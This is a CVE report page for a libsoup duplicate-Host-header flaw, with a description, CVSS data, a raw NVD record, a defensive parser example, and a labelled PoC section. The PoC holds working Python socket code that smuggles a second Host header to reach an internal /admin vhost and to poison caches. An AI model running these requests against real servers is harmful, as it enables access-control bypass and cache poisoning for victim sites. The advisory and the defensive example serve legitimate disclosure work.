Security Vulnerability Report
CVE-2025-14523 CVSS 8.2 HIGH

CVE-2025-14523

Published: 2025-12-11 13:15:59
Last Modified: 2026-04-15 00:35:42

Description

A flaw in libsoup’s HTTP header handling allows multiple Host: headers in a request and returns the last occurrence for server-side processing. Common front proxies often honor the first Host: header, so this mismatch can cause vhost confusion where a proxy routes a request to one backend but the backend interprets it as destined for another host. This discrepancy enables request-smuggling style attacks, cache poisoning, or bypassing host-based access controls when an attacker supplies duplicate Host headers.
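The mismatch described above, modelled as an added example (not libsoup's or any proxy's code): it parses a header block, shows which Host value a first-wins parser and a last-wins parser would each pick, and applies the strict rule from RFC 9112 section 3.2 that a request must carry exactly one Host header line. The function names and the sample requests are constructed for illustration.

```python
# Added example: names and sample requests are constructed, not from libsoup.

def host_values(raw: bytes) -> list[str]:
    """Return every Host field value in the header block, in wire order."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    values = []
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        # Field names are case-insensitive; "HOST" and "host" both count.
        if sep and name.strip().lower() == b"host":
            values.append(value.strip().decode("latin-1").lower())
    return values


def analyze(raw: bytes) -> dict:
    """Compare first-wins and last-wins interpretations of one request."""
    hosts = host_values(raw)
    return {
        "proxy_view": hosts[0] if hosts else None,     # first occurrence
        "backend_view": hosts[-1] if hosts else None,  # last occurrence
        "mismatch": len(set(hosts)) > 1,               # the two views differ
        # Strict handling: anything other than exactly one Host line is a 400.
        "status": 200 if len(hosts) == 1 else 400,
    }


# Constructed sample requests.
SINGLE = b"GET / HTTP/1.1\r\nHost: site-a.example\r\n\r\n"
DUPLICATE = (
    b"GET / HTTP/1.1\r\n"
    b"Host: site-a.example\r\n"
    b"HOST: site-b.example\r\n"
    b"\r\n"
)
MISSING = b"GET / HTTP/1.1\r\nAccept: */*\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("single", SINGLE), ("duplicate", DUPLICATE),
                       ("missing", MISSING)):
        print(label, analyze(req))
```

Applying the same exactly-one-Host check at the front proxy and at the backend removes the ambiguity regardless of which occurrence either side would otherwise pick.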

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

libsoup < 3.4.x (all versions prior to patch)
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Fedora (all affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket


def exploit_cve_2025_14523(target_host, target_port=80):
    """
    PoC for CVE-2025-14523 - libsoup Host header smuggling

    This demonstrates the vulnerability where multiple Host headers
    cause routing confusion between proxy and backend.
    """
    # Craft HTTP request with multiple Host headers
    # First Host: used by proxy for routing
    # Second Host: used by vulnerable libsoup backend
    request = (
        "GET /admin HTTP/1.1\r\n"
        "Host: public-proxy-route.example.com\r\n"  # Proxy uses this
        "Host: admin-internal.example.com\r\n"  # libsoup uses this (vulnerability)
        "User-Agent: Mozilla/5.0\r\n"
        "Accept: */*\r\n"
        "Connection: close\r\n"
        "\r\n"
    )

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_host, target_port))
        sock.send(request.encode())
        response = sock.recv(4096)
        sock.close()
        return response.decode('utf-8', errors='ignore')
    except Exception as e:
        return f"Error: {str(e)}"


def cache_poisoning_poc(target_host, target_port=80):
    """
    Cache poisoning attack using Host header confusion
    """
    request = (
        "GET /static/image.png HTTP/1.1\r\n"
        "Host: victim-site.com\r\n"
        "Host: attacker-controlled-site.com\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "X-Forwarded-Host: attacker-controlled-site.com\r\n"
        "\r\n"
    )

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_host, target_port))
    sock.send(request.encode())
    response = sock.recv(8192)
    sock.close()
    return response

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14523", "sourceIdentifier": "[email protected]", "published": "2025-12-11T13:15:58.983", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw in libsoup’s HTTP header handling allows multiple Host: headers in a request and returns the last occurrence for server-side processing. Common front proxies often honor the first Host: header, so this mismatch can cause vhost confusion where a proxy routes a request to one backend but the backend interprets it as destined for another host. This discrepancy enables request-smuggling style attacks, cache poisoning, or bypassing host-based access controls when an attacker supplies duplicate Host headers."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:0421", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0422", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0423", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0836", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0867", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0868", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0905", 
"source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0906", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0907", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0908", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0909", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0911", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0925", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1509", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1569", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1570", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1571", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1572", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14523", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2421349", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libsoup/-/issues/472", "source": "[email protected]"}]}}